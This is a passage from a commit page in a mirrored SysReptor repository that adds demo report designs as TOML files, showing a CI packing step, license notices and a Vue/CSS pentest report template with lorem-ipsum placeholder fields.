Cybersec
/
sysreptor
mirror of https://github.com/Syslifters/sysreptor.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Demo data archives as TOML

This commit is contained in:
Michael Wedl 2024-01-16 14:13:20 +01:00
parent 093da4c484
commit 6d8970879f
96 changed files with 27909 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.gitlab-ci.yml
View File

@ -205,6 +205,8 @@ build-docs:
- set +e
- python3 -c 'from hooks import *; generate_software_lists()' || EXIT_CODE=$?
- set -e
# Pack demo data archives
- for archive_dir in ../demo_data/*; do reptor packarchive "$archive_dir" -o "docs/assets/${archive_dir##*/}.tar.gz"; done
# Fetch remote docs from reptor CLI
- mkdir -p docs/cli && cd docs/cli
- git init && git remote add -f origin https://github.com/Syslifters/reptor.git

1
CHANGELOG.md
View File

@ -6,6 +6,7 @@
* Update build system of Vue PDF rendering script from webpack to vite
* Improve template field overview UI
* Fix error while editing ID of nested field of report section in designer
* Add demo data archives as TOML files to repository
## v2024.3 - 2024-01-09

106
demo_data/demo-designs/NOTICE Normal file
View File

@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.

21
demo_data/demo-designs/calzone-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/demo-designs/calzone-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 33 KiB

BIN
demo_data/demo-designs/calzone-assets/test.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 35 KiB

1054
demo_data/demo-designs/calzone.toml Normal file
View File

File diff suppressed because it is too large Load Diff

21
demo_data/demo-designs/margherita-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/demo-designs/margherita-assets/background-26185.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 37 KiB

BIN
demo_data/demo-designs/margherita-assets/header-logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 24 KiB

BIN
demo_data/demo-designs/margherita-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

963
demo_data/demo-designs/margherita.toml Normal file
View File

@ -0,0 +1,963 @@
format = "projecttypes/v1"
id = "5d5aae0e-0027-4646-a967-f10a38f376d3"
name = "Demo Margherita v1.1"
language = "en-US"
finding_field_order = [
"title",
"cvss",
"summary",
"short_recommendation",
"affected_components",
"description",
"recommendation",
"references",
"retest_status",
"retest_notes",
]
report_template = """
<div id="header" data-sysreptor-generated="page-header">
<div id="header-left">
<div id="header-logo">
<img src="/assets/name/header-logo.png" alt="logo" />
</div>
<div id="header-title">Security Maximale</div>
</div>
<div id="header-right">
<span class="highlight">Security Maximale GmbH</span><br>
Example Street 47 | 4771 Example<br>
FN 12345 v | District Court Example<br>
</div>
</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background">
<img id="page-cover-background-img" src="/assets/name/background-26185.jpg" alt="">
</div>
<img id="page-cover-logo" src="/assets/name/logo-transparent.png" alt="">
<div id="page-cover-infobox">
<h1 id="page-cover-title">{{ report.title }}</h1>
</div>
<div id="page-cover-customer">
<p>
<strong>Customer:</strong><br>
<strong><span class="highlight">{{ report.customer }}</span></strong><br>
{{ report.report_date }}<br>
v<template v-if="report.document_history.length > 0">
{{ report.document_history[report.document_history.length - 1].version }}
</template>
<template v-else>0.0</template>
</p>
</div>
<div id="page-cover-contact">
<strong>Contact:</strong><br>
{{ report.lead_pentester.name }}<br>
{{ report.lead_pentester.phone }}<br>
<strong><a :href="'mailto:' + report.lead_pentester.email" class="highlight">{{ report.lead_pentester.email }}</a></strong>
</div>
</section>
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 id="management-summary" class="in-toc">Executive Summary</h1>
<markdown :text="report.executive_summary" />
</section>
<pagebreak />
<section>
<h1 id="scope" class="in-toc">Methodology and Scope</h1>
<markdown :text="report.scope" />
</section>
<pagebreak />
<section>
<h1 id="findings-summary" class="in-toc">Vulnerability Overview</h1>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<figure>
<chart :width="15" :height="10" :config="{
type: 'bar',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [
finding_stats.count_critical,
finding_stats.count_high,
finding_stats.count_medium,
finding_stats.count_low,
finding_stats.count_info
],
backgroundColor: [
cssvar('--color-risk-critical'),
cssvar('--color-risk-high'),
cssvar('--color-risk-medium'),
cssvar('--color-risk-low'),
cssvar('--color-risk-info')
],
}]
},
options: {
scales: {y: {beginAtZero: true, ticks: {precision: 0}}},
plugins: {legend: {display: false}},
}
}" />
<figcaption id="distribution-of-identified-vulnerabilities">Distribution of identified vulnerabilities</figcaption>
</figure>
<table class="finding-summary-table">
<thead>
<tr>
<th>Vulnerability</th>
<th align="center">Criticality</th>
<th v-if="report.is_retest" align="center">Remediation Status</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td align="center">
<ref :to="finding.id" :class="'risk-' + finding.cvss.level">{{ lodash.capitalize(finding.cvss.level) }}</ref>
</td>
<td v-if="report.is_retest" align="center">
<ref :to="finding.id" :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</ref>
</td>
</tr>
</tbody>
</table>
</section>
<pagebreak />
<section id="findings-list">
<div v-for="(finding, findingIndex) in findings">
<h2 :id="finding.id" class="in-toc finding-title" :data-toc-title="finding.title + ' (' + capitalize(finding.cvss.level) + ')'">{{ finding.title }}</h2>
<div>
<template v-if="report.is_retest || finding.retest_status.value !== 'open'">
<strong>Remediation Status: </strong><span :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</span><br>
</template>
<strong>Criticality: </strong><span :class="'risk-' + finding.cvss.level">{{ capitalize(finding.cvss.level) }}</span><br>
<strong>CVSS-Score: </strong>
<span :class="'risk-' + finding.cvss.level">
<a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score}}</a>
<a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a>
<span v-else>{{ finding.cvss.score }}</span>
</span><br>
<template v-if="finding.affected_components && finding.affected_components.length > 0">
<strong>Affects: </strong>
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</template>
<template v-if="finding.short_recommendation">
<strong>Recommendation: </strong>
<markdown :text="finding.short_recommendation" class="markdown-inline" /><br>
</template>
</div>
<div>
<h3>Overview</h3>
<markdown :text="finding.summary" />
</div>
<div v-if="finding.retest_notes">
<h3>Remarks on Remediation Status</h3>
<markdown :text="finding.retest_notes" />
</div>
<div>
<h3 :id="finding.id + '-description'">Description</h3>
<markdown :text="finding.description" />
</div>
<div>
<h3 :id="finding.id + '-recommendation'">Recommendation</h3>
<markdown :text="finding.recommendation" />
</div>
<div v-if="finding.references && finding.references.length > 0">
<h3>Additional Information</h3>
<ul>
<li v-for="reference in finding.references">
<a :href="reference">{{ reference }}</a>
</li>
</ul>
</div>
<pagebreak />
</div>
</section>
<section>
<h1 id="document-history" class="in-toc">List of Changes</h1>
<table>
<thead>
<tr>
<th align="center">Version</th>
<th align="center">Date</th>
<th>Description</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr v-for="item in report.document_history">
<td align="center">{{ item.version }}</td>
<td align="center">{{ item.date }}</td>
<td>{{ item.description }}</td>
<td>
<comma-and-join>
<template v-for="author in item.authors" #[author]>{{ author }}</template>
</comma-and-join>
</td>
</tr>
</tbody>
</table>
</section>
<markdown>
# Disclaimer {#disclaimer .in-toc}
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
</markdown>
<markdown>
# Imprint {#imprint .in-toc}
Security Maximale GmbH<br>
Example Street 47 | 4711 Example<br>
FN 12345 v | District Court Example<br>
</markdown>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-status-open: #E83221;
--color-status-partial: #FF9300;
--color-status-resolved: #00AE51;
--color-status-accepted: #00AE51;
--color-status-changed: #4285F5;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 11pt;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.status-open { color: var(--color-status-open) !important; font-weight: bold; }
.status-partial { color: var(--color-status-partial) !important; font-weight: bold; }
.status-resolved { color: var(--color-status-resolved) !important; font-weight: bold; }
.status-accepted { color: var(--color-status-accepted) !important; font-weight: bold; }
.status-changed { color: var(--color-status-changed) !important; font-weight: bold; }
/* PDF-specific global styles */
@page {
size: A4 portrait;
margin: 35mm 26mm 26mm 26mm;
}
a {
color: inherit;
text-decoration: none;
}
pre code {
background-color: whitesmoke;
padding: 0.2em !important;
}
/* helper classes */
.location-ul {
margin: 0px;
margin-bottom:0.2em;
}
.highlight {
color: #303840;
}
/* #region header */
@page {
margin-top: 35mm;
--header-background-color: #ABABAB;
--header-margin-bottom: 5mm;
@top-left-corner {
content: "";
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
}
@top-left {
content: element(header-left);
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right {
content: element(header-right);
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right-corner {
content: "";
background-color: var(--header-background-color);
margin-bottom: var(--header-margin-bottom);
}
}
#header #header-left { position: running(header-left); }
#header #header-logo {
display: inline-block;
height: 100%;
width: 20mm;
}
#header #header-logo img {
width: 100%;
height: auto;
}
#header #header-title {
position: absolute;
top: 8mm;
left: 25mm;
color: #303840;
font-size: 16pt;
font-weight: bold;
}
#header #header-right {
position: running(header-right);
text-align: right;
color: white;
font-size: 9pt;
}
/* #endregion header */
/* #region footer */
@page {
@bottom-right-corner {
/* Page number */
content: counter(page) " / " counter(pages);
font-size: 9pt;
}
}
/* #endregion footer */
/* #region page-cover */
#page-cover {
margin: -35mm -26mm 10mm -26mm;
}
@page :first {
/* Hide header */
@top-left-corner { content: none !important; }
@top-left { content: none !important; }
@top-center { content: none !important; }
@top-right { content: none !important; }
@top-right-corner { content: none !important; }
/* Hide footer */
@bottom-left-corner { content: none !important; }
@bottom-left { content: none !important; }
@bottom-center { content: none !important; }
@bottom-right { content: none !important; }
@bottom-right-corner { content: none !important; }
}
#page-cover-background {
width: 100%;
height: 120mm;
overflow: hidden;
background-color: black;
}
#page-cover-background-img {
width: 100%;
transform: scale(1.16) translateY(-11%);
opacity: 0.7;
}
#page-cover-logo {
position: absolute;
top: -30mm;
left: -7mm;
width: 50%;
}
#page-cover-logo-text {
position: absolute;
top: -12mm;
left: 4mm;
color: #ffffff;
}
#page-cover-infobox {
position: absolute;
top: 30mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-title {
font-size: 18pt;
font-weight: normal;
margin-top: 0;
margin-bottom: 0.3em;
}
#page-cover-customer {
position: absolute;
top: 43mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-contact {
position: absolute;
top: 46mm;
right: 4mm;
text-align: right;
color: #ffffff;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(" ") " " target-counter(attr(href), page);
font-weight: normal;
}
#toc .toc-level1 {
padding-left: 0;
margin-top: 0.7rem;
font-weight: bold;
}
#toc .toc-level2 {
padding-left: 1.5rem;
margin-top: 0.35rem;
font-weight: normal;
}
#toc .toc-level3 {
padding-left: 3rem;
margin-top: 0.25rem;
font-weight: normal;
}
#toc .toc-level4 {
padding-left: 4.5rem;
margin-top: 0;
font-weight: normal;
}
/* #endregion toc */
/* #region findings-list */
#findings-list {
counter-reset: finding-counter;
}
#findings-list .finding-title::before {
counter-increment: finding-counter;
content: counter(finding-counter) ". ";
}
#findings-list .markdown h1 {
font-size: 13pt;
font-weight: bold;
}
#findings-list .markdown h2 {
font-size: 12pt;
font-weight: bold;
}
#findings-list .markdown h3 {
font-size: 11pt;
font-weight: bold;
}
/* #endregion findings-list */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO report title"
required = true
spellcheck = true
[report_fields.scope]
type = "markdown"
label = "Scope"
origin = "custom"
default = """
**TODO scope**
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
required = true
[report_fields.customer]
type = "string"
label = "Customer"
origin = "custom"
default = "TODO customer"
required = true
spellcheck = false
[report_fields.duration]
type = "string"
label = "Duration"
origin = "custom"
default = "TODO person days"
required = true
spellcheck = false
[report_fields.end_date]
type = "date"
label = "Pentest End Date"
origin = "custom"
required = true
[report_fields.is_retest]
type = "boolean"
label = "Is Retest"
origin = "predefined"
[report_fields.start_date]
type = "date"
label = "Pentest Start Date"
origin = "custom"
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.lead_pentester]
type = "object"
label = "Lead Pentester"
origin = "custom"
[report_fields.lead_pentester.properties]
[report_fields.lead_pentester.properties.name]
type = "string"
label = "Name"
origin = "custom"
default = "TODO name"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.email]
type = "string"
label = "Email"
origin = "custom"
default = "TODO email"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.phone]
type = "string"
label = "Phone Number"
origin = "custom"
default = "TODO phone"
required = true
spellcheck = false
[report_fields.document_history]
type = "list"
label = "Document History"
origin = "custom"
required = true
[report_fields.document_history.items]
type = "object"
label = ""
origin = "custom"
[report_fields.document_history.items.properties]
[report_fields.document_history.items.properties.description]
type = "string"
label = "Description"
origin = "custom"
default = "TODO description"
required = true
spellcheck = false
[report_fields.document_history.items.properties.date]
type = "date"
label = "Date"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors]
type = "list"
label = "Authors"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors.items]
type = "string"
label = ""
origin = "custom"
default = "TODO author"
required = true
spellcheck = false
[report_fields.document_history.items.properties.version]
type = "string"
label = "Version"
origin = "custom"
default = "TODO version"
required = true
spellcheck = false
[report_fields.executive_summary]
type = "markdown"
label = "Executive Summary"
origin = "custom"
default = """
**TODO summary**
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
required = true
[[report_sections]]
id = "executive_summary"
label = "Executive Summary"
fields = [
"executive_summary",
]
[[report_sections]]
id = "scope"
label = "Scope"
fields = [
"scope",
"duration",
"start_date",
"end_date",
]
[[report_sections]]
id = "customer"
label = "Customer"
fields = [
"customer",
]
[[report_sections]]
id = "other"
label = "Other"
fields = [
"title",
"report_date",
"lead_pentester",
"document_history",
"is_retest",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO: New Finding"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.summary]
type = "markdown"
label = "Summary"
origin = "predefined"
default = "TODO summary"
required = true
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO description"
required = true
[finding_fields.recommendation]
type = "markdown"
label = "Recommendation"
origin = "predefined"
default = "TODO recommendation"
required = true
[finding_fields.references]
type = "list"
label = "References"
origin = "predefined"
required = false
[finding_fields.references.items]
type = "string"
label = ""
origin = "predefined"
required = true
spellcheck = false
[finding_fields.retest_notes]
type = "markdown"
label = "Re-test Notes"
origin = "predefined"
required = false
[finding_fields.retest_status]
type = "enum"
label = "Re-test Status"
origin = "predefined"
required = false
[[finding_fields.retest_status.choices]]
label = "Open"
value = "open"
[[finding_fields.retest_status.choices]]
label = "Resolved"
value = "resolved"
[[finding_fields.retest_status.choices]]
label = "Partially Resolved"
value = "partial"
[[finding_fields.retest_status.choices]]
label = "Changed"
value = "changed"
[[finding_fields.retest_status.choices]]
label = "Accepted"
value = "accepted"
[finding_fields.affected_components]
type = "list"
label = "Affected Components"
origin = "predefined"
required = true
[finding_fields.affected_components.items]
type = "string"
label = "Component"
origin = "predefined"
default = "TODO affected component"
required = true
spellcheck = false
[finding_fields.short_recommendation]
type = "string"
label = "Short Recommendation"
origin = "predefined"
required = true
spellcheck = true
[report_preview_data]
[report_preview_data.report]
title = "Example Web-App"
scope = """
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
